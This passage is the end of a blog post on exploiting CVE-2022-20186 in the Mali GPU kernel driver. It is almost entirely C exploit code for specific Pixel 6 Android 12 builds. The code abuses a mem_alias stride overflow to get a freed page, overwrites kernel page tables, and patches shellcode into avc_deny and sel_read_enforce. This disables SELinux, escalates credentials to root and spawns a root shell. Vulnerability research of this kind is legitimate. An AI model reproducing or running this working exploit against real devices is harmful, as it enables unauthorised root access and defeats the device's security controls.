void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
uint64_t curr_overwrite_addr = 0;
for (int i = 0; i < size; i++) {
uint64_t base = reserved[i];
uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
uint64_t start_idx = compute_pt_index(base, 3);
uint64_t end_idx = compute_pt_index(end, 3);
for (uint64_t addr = base; addr < end; addr += 0x1000) {
uint64_t overwrite_addr = set_addr_lv3(addr);
if (curr_overwrite_addr != overwrite_addr) {
printf("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
curr_overwrite_addr = overwrite_addr;
for (int code = code_size - 1; code >= 0; code--) {
write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
}
usleep(300000);
}
}
}
}

int run_enforce() {
char result = '2';
sleep(3);
int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
read(enforce_fd, &result, 1);
close(enforce_fd);
printf("result %d\n", result);
return result;
}

void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
printf("fingerprint: %s\n", fingerprint);
if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
avc_deny = AVC_DENY_2108;
sel_read_enforce = SEL_READ_ENFORCE_2108;
fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
avc_deny = AVC_DENY_2201;
sel_read_enforce = SEL_READ_ENFORCE_2201;
fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
avc_deny = AVC_DENY_2202;
sel_read_enforce = SEL_READ_ENFORCE_2202;
fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);
return;
}
err(1, "unable to match build id\n");
}

//Clean up pagetable
void cleanup(int mali_fd, uint64_t gpu_va, uint64_t* reserved, size_t reserved_size) {
for (int i = 0; i < 2; i++) {
write_to(mali_fd, gpu_va + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), 2, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}
}

int run_exploit() {
uint64_t gpu_va[3];
uint64_t alias_va;
uint64_t reserved_va[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
int mali_fd = open_dev(MALI);

//init environment
setup_mali(mali_fd);
setup_tracking_page(mali_fd);

//reserve_va for spraying pgd from next_pool
reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, reserved_va);

//try to drain mem_pool
void* pool_region = drain_mem_pool(mali_fd);
printf("mem_pool has been drained.\n");

//mem_alloc 2 mapping area
for (int i = 0; i < 2; i++){
gpu_va[i] = (uint64_t)map_gpu(mali_fd, 3, 0, 1);
printf("gpu_va[i] == %lx\n", gpu_va[i]);
}

//mem_alias to trigger vulnerability
union kbase_ioctl_mem_alias alias = {0};
alias.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
alias.in.stride = 9223372036854775808ull + 1;

alias.in.nents = 2;
struct base_mem_aliasing_info ai[2];
ai[0].handle.basep.handle = gpu_va[0];
ai[1].handle.basep.handle = gpu_va[0];
ai[0].length = 0x3;
ai[1].length = 0x3;
ai[0].offset = 0;
ai[1].offset = 0;
alias.in.aliasing_info = (uint64_t)(&(ai[0]));
mem_alias(mali_fd, &alias);
printf("alias.out.gpu_va == %lx\n", (size_t)alias.out.gpu_va);
printf("alias.out.va_pages == %lx\n", (size_t)alias.out.va_pages);
void* alias_region = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va);
if (alias_region == MAP_FAILED) {
err(1, "mmap failed");
}

munmap(alias_region, 0x2000);

//release mem_pool to make mem_pool full
release_mem_pool(pool_region);
printf("mem_pool has been released to make sure mem_pool state is full.\n");

//munmap gpu_va[0] & alias_gpu_va to release area to next_pool where pgd get space from here
munmap((void *)gpu_va[0], 0x3000);
printf("munmap UAF page to next_pool.\n");

//alloc page from next_pool where UAF page just was freed for pgd
map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, reserved_va);
printf("try to alloc pgd from next_pool.\n");

//Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
for (int i = 0; i < 2; i++) {
write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}

usleep(100000);
//Go through the reserve pages addresses to write to sel_read_enforce with our own shellcode
write_func(mali_fd, avc_deny, &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));

//Triggers avc_deny to disable SELinux
open("/dev/kmsg", O_RDONLY);
printf("Triggers avc_deny to disable SELinux.\n");

uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;

//Writing to gpu_va[1] will now overwrite the level 3 pgd in one of the reserved pages mapped earlier.
for (int i = 0; i < 2; i++) {
write_to(mali_fd, gpu_va[1] + i * 0x1000 + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
}

//Call commit_creds to overwrite process credentials to gain root
write_func(mali_fd, sel_read_enforce, &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));

run_enforce();
printf("try to gain root...\n");

cleanup(mali_fd, gpu_va[1], &(reserved_va[0]), TOTAL_RESERVED_SIZE/RESERVED_SIZE);
usleep(100000);

return 0;
}

int main() {
setbuf(stdout, NULL);
setbuf(stderr, NULL);

select_offset();

int ret = -1;
sleep(1);
ret = run_exploit();
if (!ret) system("sh");
}

Reference:

https://github.blog/security/vulnerability-research/corrupting-memory-without-memory-corruption/

  • Title: CVE-2022-20186 mali gpu 漏洞利用
  • Author: henry
  • Created at : 2024-12-02 16:59:07
  • Updated at : 2024-12-02 17:07:08
  • Link: https://henrymartin262.github.io/2024/12/02/CVE-2022-20186/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments